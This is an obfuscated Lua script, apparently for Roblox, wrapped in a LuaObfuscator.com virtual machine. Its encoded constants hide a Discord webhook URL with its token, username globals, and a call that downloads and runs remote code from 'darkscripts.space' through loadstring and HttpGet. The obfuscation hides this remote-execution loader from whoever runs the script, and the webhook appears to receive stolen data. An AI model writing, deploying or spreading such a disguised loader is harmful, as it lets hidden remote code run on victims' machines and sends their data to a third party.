--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v87=v5(v81,v19);v19=nil;return v87;else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=(v31/((5 -(1640 -(1523 + 114)))^(v32-(2 -1))))%((3 -1)^(((v33-1) -(v32-((2 + 0) -1))) + (620 -(555 + 64)))) ;return v82-(v82%(932 -((1221 -364) + 74))) ;else local v83=1065 -(68 + 997) ;local v84;while true do if (v83==(568 -(367 + 201))) then v84=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (877 -(282 + 595)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;return (v36 * (373 -(32 + 85))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 1 + (5 -2) ;return (v40 * (16778173 -(892 + 65))) + (v39 * (156337 -90801)) + (v38 * 256) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=(1 + 0) -0 ;local v44=(v20(v42,351 -((154 -67) + 263) ,200 -(67 + 113) ) * ((2 + 0)^(78 -46))) + v41 ;local v45=v20(v42,16 + 5 ,31);local v46=((v20(v42,127 -95 )==(953 -(802 + 149 + 1))) and  -1) or (2 -1) ;if (v45==((791 -(368 + 423)) -0)) then if (v44==(0 + 0)) then return v46 * (997 -(915 + 82)) ;else v45=2 -1 ;v43=0 + (0 -0) ;end elseif (v45==(2691 -644)) then return ((v44==0) and (v46 * ((1188 -(1069 + 118))/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(2237 -1214) ) * (v43 + (v44/(2^52))) ;end local function v25(v47) local v48;if  not v47 then v47=v23();if (v47==(0 -0)) then return "";end end v48=v3(v16,v18,(v18 + v47) -(19 -(10 + 8)) );v18=v18 + v47 ;local v49={};for v64=3 -2 , #v48 do v49[v64]=v2(v1(v3(v48,v64,v64)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50=(function() return 1509 -(663 + 846) ;end)();local v51=(function() return;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();while true do local v66=(function() return 0;end)();while true do if (v66==(1 -0)) then if (v50==(1 + 0)) then local v94=(function() return 0 -0 ;end)();while true do if (v94~=(605 -(268 + 335))) then else v50=(function() return 2 + 0 ;end)();break;end if ((291 -(60 + 230))~=v94) then else v57=(function() return {};end)();for v105= #"\\",v56 do local v106=(function() return 0 + 0 ;end)();local v107=(function() return;end)();local v108=(function() return;end)();while true do if (v106==(573 -(426 + 146))) then if (v107== #".") then v108=(function() return v21()~=(396 -(115 + 281)) ;end)();elseif (v107==(4 -2)) then v108=(function() return v24();end)();elseif (v107~= #"asd") then else v108=(function() return v25();end)();end v57[v105]=(function() return v108;end)();break;end if (v106~=(0 + 0)) then else local v117=(function() return 0;end)();local v118=(function() return;end)();while true do if (v117~=(811 -(569 + 242))) then else v118=(function() return 0 -0 ;end)();while true do if (v118==(2 -1)) then v106=(function() return 1 + 0 ;end)();break;end if (v118==0) then v107=(function() return v21();end)();v108=(function() return nil;end)();v118=(function() return 1025 -(706 + 318) ;end)();end end break;end end end end end v94=(function() return 2;end)();end if ((0 -0)==v94) then v55=(function() return {v52,v53,nil,v54};end)();v56=(function() return v23();end)();v94=(function() return 868 -(550 + 317) ;end)();end end end break;end if (v66==(1251 -(721 + 530))) then if (v50~=(0 -0)) then else local v95=(function() return 1271 -(945 + 326) ;end)();while true do if ((2 -0)==v95) then v50=(function() return 2 -1 ;end)();break;end if (v95==1) then v53=(function() return {};end)();v54=(function() return {};end)();v95=(function() return 5 -3 ;end)();end if (v95==(0 + 0)) then v51=(function() return function(v109,v110,v111) local v112=(function() return 285 -(134 + 151) ;end)();local v113=(function() return;end)();while true do if (v112==0) then v113=(function() return 1665 -(970 + 695) ;end)();while true do if (0~=v113) then else local v169=(function() return 0;end)();local v170=(function() return;end)();while true do if ((700 -(271 + 429))==v169) then v170=(function() return 0;end)();while true do if ((0 -0)~=v170) then else local v175=(function() return 0;end)();while true do if (v175==0) then v109[v110-#" " ]=(function() return v111();end)();return v109,v110,v111;end end end end break;end end end end break;end end end;end)();v52=(function() return {};end)();v95=(function() return 1;end)();end end end if (v50~=2) then else v55[ #"gha"]=(function() return v21();end)();for v97= #"~",v23() do local v98=(function() return v21();end)();if (v20(v98, #"!", #"!")~=(1990 -(582 + 1408))) then else local v100=(function() return 0;end)();local v101=(function() return;end)();local v102=(function() return;end)();local v103=(function() return;end)();local v104=(function() return;end)();while true do if (v100~=(0 -0)) then else local v114=(function() return 1288 -(993 + 295) ;end)();local v115=(function() return;end)();while true do if (v114==(0 + 0)) then v115=(function() return 0;end)();while true do if (v115==(1 -0)) then v100=(function() return 3 -2 ;end)();break;end if (v115==(1824 -(1195 + 629))) then v101=(function() return 0 + 0 ;end)();v102=(function() return nil;end)();v115=(function() return 1 -0 ;end)();end end break;end end end if (v100==(243 -(187 + 54))) then while true do if (v101==(0 + 0)) then local v155=(function() return 780 -(162 + 618) ;end)();while true do if (v155==1) then v101=(function() return  #"]";end)();break;end if ((0 + 0)==v155) then v102=(function() return v20(v98,2 + 0 , #"nil");end)();v103=(function() return v20(v98, #".com",12 -6 );end)();v155=(function() return 1 -0 ;end)();end end end if (v101== #"91(") then if (v20(v103, #"xnx", #"91(")~= #",") then else v104[ #".com"]=(function() return v57[v104[ #".com"]];end)();end v52[v97]=(function() return v104;end)();break;end if (v101~=(1 + 1)) then else local v157=(function() return 1636 -(1373 + 263) ;end)();local v158=(function() return;end)();while true do if ((0 + 0)==v157) then v158=(function() return 1145 -(466 + 679) ;end)();while true do if (v158==0) then if (v20(v103, #" ", #"!")== #"!") then v104[2]=(function() return v57[v104[1002 -(451 + 549) ]];end)();end if (v20(v103,5 -3 ,1902 -(106 + 1794) )== #">") then v104[ #"nil"]=(function() return v57[v104[ #"91("]];end)();end v158=(function() return 1 + 0 ;end)();end if (v158==1) then v101=(function() return  #"-19";end)();break;end end break;end end end if (v101== #">") then local v159=(function() return 0;end)();local v160=(function() return;end)();while true do if (v159==(0 + 0)) then v160=(function() return 0;end)();while true do if (v160~=(0 + 0)) then else v104=(function() return {v22(),v22(),nil,nil};end)();if (v102==(0 -0)) then local v178=(function() return 1384 -(746 + 638) ;end)();local v179=(function() return;end)();while true do if (v178~=(0 + 0)) then else v179=(function() return 0 -0 ;end)();while true do if (v179==(114 -(4 + 110))) then v104[ #"91("]=(function() return v22();end)();v104[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v102== #"~") then v104[ #"-19"]=(function() return v23();end)();elseif (v102==2) then v104[ #"19("]=(function() return v23() -((2 -0)^16) ;end)();elseif (v102== #"91(") then local v185=(function() return 341 -(218 + 123) ;end)();local v186=(function() return;end)();while true do if (v185==(584 -(57 + 527))) then v186=(function() return 1581 -(1535 + 46) ;end)();while true do if (v186~=(103 -(17 + 86))) then else v104[ #"asd"]=(function() return v23() -((2 + 0)^(3 + 13)) ;end)();v104[ #"0836"]=(function() return v22();end)();break;end end break;end end end v160=(function() return 1 -0 ;end)();end if ((561 -(306 + 254))~=v160) then else v101=(function() return 1 + 1 ;end)();break;end end break;end end end end break;end if ((2 -1)==v100) then v103=(function() return nil;end)();v104=(function() return nil;end)();v100=(function() return 168 -(122 + 44) ;end)();end end end end for v99= #"~",v23() do v53,v99,v28=(function() return v51(v53,v99,v28);end)();end return v55;end v66=(function() return 1 -0 ;end)();end end end end local function v29(v58,v59,v60) local v61=v58[1 -0 ];local v62=v58[2 -0 ];local v63=v58[9 -6 ];return function(...) local v67=v61;local v68=v62;local v69=v63;local v70=v27;local v71=1 + 0 ;local v72= -(1 + (1205 -(902 + 303)));local v73={};local v74={...};local v75=v12("#",...) -(66 -(30 + 35)) ;local v76={};local v77={};for v85=0 + 0 ,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + (1258 -(1043 + (515 -301))) ];else v77[v85]=v74[v85 + (3 -2) ];end end local v78=(v75-v69) + (1213 -(28 + 295 + 889)) ;local v79;local v80;while true do local v86=1580 -(1183 + 397) ;while true do if (v86==(2 -1)) then if ((v80<=((2277 -(1121 + 569)) -(361 + 219))) or (2396>2904)) then if ((v80<=((537 -(22 + 192)) -(53 + 267))) or (2110<=332)) then if (v80<=(1 + 0)) then if (v80==(413 -((698 -(483 + 200)) + 398))) then do return;end else v77[v79[984 -(18 + 964) ]]=v79[(1474 -(1404 + 59)) -8 ];end elseif ((3686>3172) and (v80==(2 + 0))) then v77[v79[5 -3 ]]();else v77[v79[2 + (0 -0) ]]=v79[3];end elseif ((v80<=(855 -((26 -6) + (1595 -(468 + 297))))) or (3315<=2782)) then if (v80>(4 + 0)) then do return;end else v77[v79[128 -(116 + 10) ]]();end elseif (v80>(1 + 5)) then v60[v79[3 + 0 ]]=v77[v79[740 -(542 + 196) ]];else local v125=0;local v126;local v127;while true do if (((1 -0)==v125) or (876>=2964) or (4474<820)) then v77[v126 + (1 -0) ]=v127;v77[v126]=v127[v79[2 + 2 ]];break;end if ((v125==0) or (2232>2497)) then v126=v79[2 + 0 ];v127=v77[v79[2 + (563 -(334 + 228)) ]];v125=477 -(41 + 435) ;end end end elseif (v80<=((94 -66) -17)) then if (v80<=(22 -13)) then if ((4279>=2882) and (v80>(1133 -(936 + 189)))) then local v128=v79[2];local v129=v77[v79[1 + (4 -2) ]];v77[v128 + ((2926 -1312) -(1565 + 48)) ]=v129;v77[v128]=v129[v79[3 + 1 ]];else v60[v79[1554 -(320 + 806 + 425) ]]=v77[v79[407 -(118 + 287) ]];end elseif (v80==(39 -(265 -(141 + 95)))) then local v135=0 -0 ;local v136;while true do if (v135==(1121 -(118 + 1003))) then v136=v79[5 -(3 + 0) ];v77[v136]=v77[v136](v13(v77,v136 + (378 -(142 + 235)) ,v72));break;end end else local v137=1875 -(157 + 1718) ;local v138;local v139;local v140;local v141;while true do if (v137==(0 -(0 -0))) then v138=v79[1 + 1 ];v139,v140=v70(v77[v138](v13(v77,v138 + (3 -2) ,v79[980 -(553 + (1018 -594)) ])));v137=2 -1 ;end if ((v137==(3 -1)) or (2029>=3521)) then for v172=v138,v72 do v141=v141 + 1 + 0 ;v77[v172]=v139[v141];end break;end if ((v137==(1 + 0)) or (2037>=4642)) then v72=(v140 + v138) -(1 + 0) ;v141=0 + 0 ;v137=2 + 0 ;end end end elseif ((1720<4458) and (v80<=(27 -14))) then if (v80>12) then v77[v79[5 -3 ]]=v60[v79[6 -3 ]];else v77[v79[1 + 1 ]]=v60[v79[14 -11 ]];end elseif ((v80==(767 -(239 + 514))) or (436>3021)) then local v146=v79[1 + 1 ];v77[v146]=v77[v146](v13(v77,v146 + (1330 -(187 + 610 + 532)) ,v72));else local v148=v79[2 + 0 ];local v149,v150=v70(v77[v148](v13(v77,v148 + 1 + 0 ,v79[6 -3 ])));v72=(v150 + v148) -(1203 -(373 + 829)) ;local v151=731 -(476 + (698 -443)) ;for v152=v148,v72 do v151=v151 + (1131 -(369 + 761)) ;v77[v152]=v149[v151];end end v71=v71 + 1 + 0 ;break;end if ((0 -0)==v86) then v79=v67[v71];v80=v79[1];v86=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3O0003083O00557365726E616D6503063O0046583344584403093O00557365726E616D653203123O00536372697074657247657473526F2O62656403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31322O373033393731363837323631383036352F6C5A7169475A5F76376B666D437549715652314E346272714D377566735646706E6450377273506A5545786C4363336B494F724A44664E6B4B5863393332356130774138030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403193O00682O7470733A2O2F6461726B736372697074732E7370616365000E3O0012033O00023O0012073O00013O0012033O00043O0012073O00033O0012033O00063O0012073O00053O00120D3O00073O00120D000100083O0020090001000100090012030003000A4O000B000100034O000E5O00022O00043O000100016O00017O00",v9(),...);
